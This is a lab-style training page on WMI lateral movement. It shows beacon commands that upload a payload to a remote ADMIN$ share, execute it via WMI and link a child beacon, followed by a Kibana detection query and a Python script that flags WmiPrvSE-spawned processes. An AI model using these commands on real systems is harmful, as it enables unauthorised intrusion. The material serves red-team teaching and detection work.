Windows Management Instrumentation (WMI)
As you may have noticed, WMI is not part of the jump command, but it is part of remote-exec. The remote-exec method uses WMI's "process call create" to execute any command we specify on the target. The most straightforward means of using this is to upload a payload to the target system and use WMI to execute it.
You can upload a file to a remote machine by cd'ing to the desired UNC path and then using the upload command.
beacon> cd \\web.dev.cyberbotic.io\ADMIN$
beacon> upload C:\Payloads\smb_x64.exe
beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
Started process 3280 on web.dev.cyberbotic.io
The process is now running on WEB so now we need to connect to it.
beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
[+] established link to child beacon: 10.10.122.30
As with WinRM, the process will be running in an elevated context of the calling user.
When a binary is executed via WMI in this way, it will be a child of WmiPrvSE.exe. We can therefore look for process create events where WmiPrvSE is the parent.
event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe
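The query above can be reproduced outside Kibana for testing or for a lightweight log-review script. The following is an added example and not part of the original course material: it applies the same three conditions (process category, start type, parent image WmiPrvSE.exe) to ECS-style events whose field names match the query. The events are constructed for illustration, the host names other than WEB are made up, and the comparison is case-insensitive because Windows image names are. It also handles the ECS convention of `event.category` and `event.type` arriving as arrays, and events where the agent could not resolve a parent. Bear in mind that WmiPrvSE.exe is also the parent of processes launched by legitimate WMI management tooling, so the per-host summary is there to help build a baseline rather than to alert on every hit.

```python
"""Match process-start events whose parent is WmiPrvSE.exe.

Added example, not part of the original page. The sample events are constructed
in a flattened ECS-style layout using the field names from the page's query.
"""
from collections import Counter

# Constructed sample events (not real telemetry). Host "SRV2" is made up.
SAMPLE_EVENTS = [
    {"@timestamp": "2024-01-01T10:00:00Z", "host.name": "WEB",
     "event.category": "process", "event.type": "start",
     "process.name": "smb_x64.exe", "process.pid": 3280,
     "process.parent.name": "WmiPrvSE.exe"},
    {"@timestamp": "2024-01-01T10:00:01Z", "host.name": "WEB",
     "event.category": "process", "event.type": "start",
     "process.name": "cmd.exe", "process.pid": 4100,
     "process.parent.name": "explorer.exe"},
    # ECS allows event.category / event.type to be arrays; some shippers send them that way.
    {"@timestamp": "2024-01-01T10:00:02Z", "host.name": "SRV2",
     "event.category": ["process"], "event.type": ["start"],
     "process.name": "powershell.exe", "process.pid": 5120,
     "process.parent.name": "wmiprvse.exe"},
    # The provider host itself starting under svchost is not a WMI-launched process.
    {"@timestamp": "2024-01-01T10:00:03Z", "host.name": "WEB",
     "event.category": "process", "event.type": "start",
     "process.name": "WmiPrvSE.exe", "process.pid": 6000,
     "process.parent.name": "svchost.exe"},
    # A process-end event for the first process; the query only wants starts.
    {"@timestamp": "2024-01-01T10:05:00Z", "host.name": "WEB",
     "event.category": "process", "event.type": "end",
     "process.name": "smb_x64.exe", "process.pid": 3280,
     "process.parent.name": "WmiPrvSE.exe"},
    # No parent resolved (the agent could not look it up); must not match or crash.
    {"@timestamp": "2024-01-01T10:06:00Z", "host.name": "WEB",
     "event.category": "process", "event.type": "start",
     "process.name": "notepad.exe", "process.pid": 7000},
]


def _values(field):
    """Normalise a scalar-or-list ECS field to a list of lowercase strings."""
    if field is None:
        return []
    if isinstance(field, (list, tuple)):
        return [str(v).lower() for v in field]
    return [str(field).lower()]


def is_wmi_spawned(event):
    """Python equivalent of the page's query:
    event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe
    """
    return ("process" in _values(event.get("event.category"))
            and "start" in _values(event.get("event.type"))
            and "wmiprvse.exe" in _values(event.get("process.parent.name")))


def find_wmi_spawned(events):
    """Return the matching events, preserving input order."""
    return [e for e in events if is_wmi_spawned(e)]


def summarise_by_host(events):
    """Count WMI-spawned process starts per host; a host that suddenly receives
    remote execution it never saw before stands out against a baseline."""
    return Counter(e.get("host.name", "<unknown>") for e in find_wmi_spawned(events))


if __name__ == "__main__":
    for e in find_wmi_spawned(SAMPLE_EVENTS):
        print(f'{e["@timestamp"]} {e["host.name"]}: '
              f'{e["process.parent.name"]} -> {e["process.name"]} (pid {e.get("process.pid")})')
    print(dict(summarise_by_host(SAMPLE_EVENTS)))
```

Run it as a script to list the two matching starts (smb_x64.exe on WEB and powershell.exe on SRV2) and the per-host counts; `is_wmi_spawned` can be dropped into any pipeline that hands you one ECS document at a time.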